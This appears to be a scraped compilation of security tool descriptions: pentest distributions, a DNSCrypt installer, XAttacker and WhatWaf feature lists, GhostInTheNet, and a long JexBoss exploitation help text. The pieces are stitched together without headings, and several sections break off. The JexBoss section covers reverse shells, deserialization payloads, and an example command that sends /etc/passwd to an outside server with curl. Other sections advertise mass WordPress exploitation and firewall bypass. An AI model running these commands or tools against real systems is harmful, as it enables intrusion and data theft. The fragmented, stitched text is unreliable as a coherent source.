BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
A script for installing and automatically configuring DNSCrypt on Linux-based systems.
Description
DNSCrypt is a protocol for securing communications between a client and a DNS resolver by encrypting DNS queries and responses. It verifies that responses you get from a DNS provider have actually been sent by that provider, and haven't been tampered with.
This script will automatically and securely set up DNSCrypt as a background service that runs at system startup using DNSCrypt-proxy, the libsodium cryptography library, and the DNSCrypt service provider of your choice. The script also has options that allow you to change the service provider at any time, turn off DNSCrypt to use regular unencrypted DNS, as well as uninstall DNSCrypt.
Installation The script supports recent Red Hat-based (CentOS, Fedora, Scientific Linux), Debian-based (Debian, Ubuntu, Linux Mint) distributions and OpenSUSE.
Note
Scripts with sysvinit support were moved to the "legacy" branch (CentOS 6, Debian 7, Ubuntu < 16.04)
wget https://raw.githubusercontent.com/simonclausen/dnscrypt-autoinstall/master/dnscrypt-autoinstall
chmod +x dnscrypt-autoinstall
su -c ./dnscrypt-autoinstall
Supported providers Providers are retrieved from the latest published dnscrypt-resolvers.csv (github.com/jedisct1), with a fallback to those included with the DNSCrypt installation. Troubleshooting If the install fails at a particular stage and the script mentions DNSCrypt is already configured, use the forcedel argument to force an uninstallation:
Example if you have list websites run tool with this command line
perl XAttacker.pl -l list.txt
if you don't have list websites run the tool with this command
perl XAttacker.pl
For coloring in windows Add This Line
use Win32::Console::ANSI;
Version Current version is 2.1What's New • Wordpress Levo-Slideshow 2.3 - Arbitrary File Upload • GS-Dorker • speed up • Bug fixes version 2.0 • speed up • Bug fixes version 1.9 • Bug fixes
Wireshark is the most widely used network
capture and protocol analyzer on the market. It is used by IT and
Network administrators to troubleshoot network connectivity issues and
by Network Security analysts to dissect network attacks. This free and
open source application is so widely used in the industry because it
works. It is cross platform, meaning that it runs on Windows, Mac,
Linux and FreeBSD. This course is an introduction to the
application and goes over the basics to get you started capturing and
analyzing network traffic. It will build your base by explaining the
theory behind how networks work and then get you in to real world
applications of the software. In this course you will learn:
The basics of how networks operate
How to capture traffic on wireshark
How to use display and capture filters
How to use command line wireshark to work with large packet captures
Who is the target audience?
Network Administrators
System Administrators
IT Security Analysts
Type: Course Language: English Number of videos: 24 Year: 2015 Format: MP4 Size: 675 MB Password: offsec
Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan.
Properties:
Network Invisibility
Network Anonymity
Protects from MITM/DOS
Transparent
Cross-platform
Minimalistic
Dependencies:
Linux 2.4.26+ - will work on any Linux-based OS, including Whonix and RaspberryPI
BASH - the whole script
root privileges - for kernel controlling
Limitations:
You can still be found with VLAN logs if using ethernet or by triangulation/broadcast if using WiFi
MAC spoofing won't work if appropriate mitigations has been taken, like DAI or sticky MAC
Might be buggy with some CISCO switches
Not suitable for production servers
How it works The basic and primary network protocol is ARP for IPv4 and NDP (ICMPv6) for IPv6, located in the link and network layer, provides main connectivity in a LAN. Despite its utility and simplicity, it has numerous vulnerabilities that can lead to a MITM attack and leak of confidentiality. Patching of such a widely used standard is a practically impossible task. A very simple, but at the same time effective solution is to disable ARP and NDP responses on an interface and be very cautious with broadcasting. Considering the varieties of implementations, this means that anyone in the network wouldn't be able to communication with such host, only if the host is willing it-self. The ARP/NDP cache will be erased quickly afterwards. Here is an example schema:
A >>> I need MAC address of B >>> B
A <<< Here it is <<< B
A <<< I need MAC address of A <<< B
A >>> I'm not giving it >>> B
To increase privacy, it's advised to spoof the MAC address, which will provide a better concealment. All this is possible using simple commands in Linux kernel and a script that automates it all. Analysis No ARP/NDP means no connectivity, so an absolute stealth and obscurity on the network/link layer. This protects from all possible DOSes and MITMs (ARP, DNS, DHCP, ICMP, Port Stealing) and far less resource consuming like ArpON. Such mitigation implies impossibility of being scanned (nmap, arping). Besides, it doesn't impact a normal internet or LAN connection on the host perspective. If you're connecting to a host, it will be authorised to do so, but shortly after stopping the communication, the host will forget about you because, ARP/NDP tables won't stay long without a fresh request. Regarding the large compatibility and cross-platforming, it's very useful for offsec/pentest/redteaming as well. You see everyone, but nobody sees you, you're a ghost. Mitigation and having real supervision on the network will require deep reconfiguration of OSes, IDPSes and all other equipement, so hardly feasible. HowTo You can execute the script after the connection to the network or just before:
sudo GhostInTheNet.sh on eth0
This will activate the solution until reboot. If you want to stop it:
sudo GhostInTheNet.sh off eth0
Of course, you will have to make the script executable in the first place:
chmod u+x GhostInTheNet.sh
Notes ARP/NDP protocol can be exploited for defensive purpose. Now your Poisontap is literally undetectable and your Tails is even more anonymous. You should learn some stuff about IPv6.
Ability to run on a single URL with the -u/--url flag
Ability to run through a list of URL's with the -l/--list flag
Ability to detect over 40 different firewalls
Ability to try over 20 different tampering techniques
Ability to pass your own payloads either from a file or from the terminal
Payloads that are guaranteed to produce at least one WAF triggering
Ability to bypass firewalls using both SQLi techniques and cross site scripting techniques
Ability to run behind Tor
Ability to run behind multiple proxy types (socks4, socks5, http, https)
Ability to use a random user agent, personal user agent, or custom default user agent
More to come...
Installation Installing whatwaf is super easy, all you have to do is the following: Have Python 2.7, Python 3.x compatibility is being implemented soon:
Features The tool and exploits were developed and tested for:
JBoss Application Server versions: 3, 4, 5 and 6.
Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)
The exploitation vectors are:
/admin-console
tested and working in JBoss versions 5 and 6
/jmx-console
tested and working in JBoss versions 4, 5 and 6
/web-console/Invoker
tested and working in JBoss versions 4, 5 and 6
/invoker/JMXInvokerServlet
tested and working in JBoss versions 4, 5 and 6
Application Deserialization
tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters
Servlet Deserialization
tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)
Apache Struts2 CVE-2017-5638
tested in Apache Struts 2 applications
Others
Videos
Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss
Exploiting JBoss Application Server with JexBoss
Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)
Reverse Shell (meterpreter integration) After you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command:
When exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute. Usage examples
For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:
For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):
optional arguments:
-h, --help show this help message and exit
--version show program's version number and exit
--auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE
PERMISSION!!!)
--disable-check-updates, -D
Disable two updates checks: 1) Check for updates
performed by the webshell in exploited server at
http://webshell.jexboss.net/jsp_version.txt and 2)
check for updates performed by the jexboss client at
http://joaomatosf.com/rnp/releases.txt
-mode {standalone,auto-scan,file-scan}
Operation mode (DEFAULT: standalone)
--app-unserialize, -j
Check for java unserialization vulnerabilities in HTTP
parameters (eg. javax.faces.ViewState, oldFormData,
etc)
--servlet-unserialize, -l
Check for java unserialization vulnerabilities in
Servlets (like Invoker interfaces)
--jboss Check only for JBOSS vectors.
--jenkins Check only for Jenkins CLI vector.
--jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat
(CVE-2016-8735 and CVE-2016-8735). OBS: Will not be
checked by default.
--proxy PROXY, -P PROXY
Use a http proxy to connect to the target URL (eg. -P
http://192.168.0.1:3128)
--proxy-cred LOGIN:PASS, -L LOGIN:PASS
Proxy authentication credentials (eg -L name:password)
--jboss-login LOGIN:PASS, -J LOGIN:PASS
JBoss login and password for exploit admin-console in
JBoss 5 and JBoss 6 (default: admin:admin)
--timeout TIMEOUT Seconds to wait before timeout connection (default 3)
Standalone mode:
-host HOST, -u HOST Host address to be checked (eg. -u
http://192.168.0.10:8080)
Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
--reverse-host RHOST:RPORT, -r RHOST:RPORT
Remote host address and port for reverse shell when
exploiting Java Deserialization Vulnerabilities in
application layer (for now, working only against *nix
systems)(eg. 192.168.0.10:1331)
--cmd CMD, -x CMD Send specific command to run on target (eg. curl -d
@/etc/passwd http://your_server)
--windows, -w Specifies that the commands are for rWINDOWS System$
(cmd.exe)
--post-parameter PARAMETER, -H PARAMETER
Specify the parameter to find and inject serialized
objects into it. (egs. -H javax.faces.ViewState or -H
oldFormData (<- Hi PayPal =X) or others) (DEFAULT:
javax.faces.ViewState)
--show-payload, -t Print the generated payload.
--gadget {commons-collections3.1,commons-collections4.0,groovy1}
Specify the type of Gadget to generate the payload
automatically. (DEFAULT: commons-collections3.1 or
groovy1 for JenKins)
--load-gadget FILENAME
Provide your own gadget from file (a java serialized
object in RAW mode)
--force, -F Force send java serialized gadgets to URL informed in
-u parameter. This will send the payload in multiple
formats (eg. RAW, GZIPED and BASE64) and with
different Content-Types.
Auto scan mode:
-network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)
-ports PORTS List of ports separated by commas to be checked for
each host (eg. 8080,8443,8888,80,443)
-results FILENAME File name to store the auto scan results
File scan mode:
-file FILENAME_HOSTS Filename with host list to be scanned (one host per
line)
-out FILENAME_RESULTS
File name to store the file scan results
Security GNU/Linux distribution designed with cloud pentesting and IoT security in mind.
It includes a full portable laboratory for security and digital forensics experts, but it also includes all you need to develop your own softwares or protect your privacy with anonymity and crypto tools.
Details
Security
Parrot Security includes a full arsenal of security oriented tools to perform penetration tests, security audits and more. With a Parrot usb drive in your pocket you will always be sure to have all you need with you.
Privacy
Parrot includes by default TOR, I2P, anonsurf, gpg, tccf, zulucrypt, veracrypt, truecrypt, luks and many other tecnologies designed to defend your privacy and your identity.
Development
If you need a comfortable environment with updated frameworks and useful libraries already installed, Parrot will amaze you as it includes a full development-oriented environment with some powerful editors and IDEs pre-installed and many other tools installable from our repository.
Features
System Specs
Debian GNU/Linux 9 (stretch)
Custom hardened Linux 4.8 kernel
Rolling release updates
Powerful worldwide mirror servers
High hardware compatibility
Community-driven development
free(libre) and open source project
Cryptography
Parrot includes many cryptographic softwares which are extremely useful when it comes to protect your confidential data and defend your privacy.
Parrot includes several cryptographic front-ends to work both with symmetric and asymmetric encryption, infact it natively supports volumes encryption with LUKS, TrueCrypt, VeraCrypt and the hidden TrueCrypt/VeraCrypt volumes with nested algorythms support.
The whole system can be installed inside an encrypted partition to protect your computer in case of theft.
Another swiss army knife of your privacy is GPG, the GNU Privacy Guard, an extremely powerful PGP software that lets you create a private/public pair of keys to apply digital signatures to your messages and to allow other people to send you encrypted messages that only your private key can decrypt, in can also handle multiple identities and subkeys, and its power resides in its ring of trust as PGP users can sign each other's keys to make other people know if a digital identity is valid or not.
Even our software repository is digitally signed by GPG, and the system automatically verifies if an update was altered or compromised and it refuses to upgrade or to install new software if our digital signature is not found or not valid.
Privacy
Your privacy is the most valuable thing you have in your digital life and the whole Parrot Team is exaggeratedly paranoid when it comes to users privacy, infact our system doesn't contain tracking systems, and it is hardened in deep to protect users from prying eyes.
Parrot has developed and implemented several tricks and softwares to achieve this goal, and AnonSurf is one of the most important examples, it is a software designed to start TOR and hijack all the internet traffic made by the system through the TOR network, we have also modified the system to make it use DNS servers different from those offered by your internet provider.
Parrot also includes torbrowser, torchat and other anonymous services, like I2P, a powerful alternative to TOR.
Programming
The main goal of an environment designed by hackers for hackers is the possibility to change it, adapt it, transform it and use it as a development platform to create new things, this is why Parrot comes out of the box with several tools for developers such as compilers, disassemblers, IDEs, comfortable editors and powerful frameworks.
Parrot includes QTCreator as its main C, C++ and Qt framework. Another very useful tool is Geany, a lightweight and simple IDE which supports a huge amount of programming languages, while we also include Atom, the opensource editor of the future developed by GitHub, and many compilers and interpreters with their most important libraries are pre-installed and ready to use.
And of course many other editors, development softwares and libraries are available through our software repository where we keep all the development tools always updated to their most cutting edge but reliable version. Changelog The first big news is the introduction of a full firejail+apparmor
sandboxing system to proactively protect the OS by isolating its
components with the combination of different tecniques. The first
experiments were already introduced in Parrot 3.9 with the inclusion of
firejail. In Parrot 3.10 also introduced the new Firefox 57 (Quantum) that
landed on Parrot very naturally with a complete browser restyle. The other big news is the introduction of the latest Linux 4.14
kernel, and it is a very important improvement for us because of the
awesome features of this new kernel release and its improved hardware
support. Some pentest tools received some important upstream updates,
like metasploit-framework, that reached its 4.21 version, or maltegoce
and casefile that were merged into a unique launcher provided by the new
maltego 4.1. To upgrade the system, open a terminal window and type the following command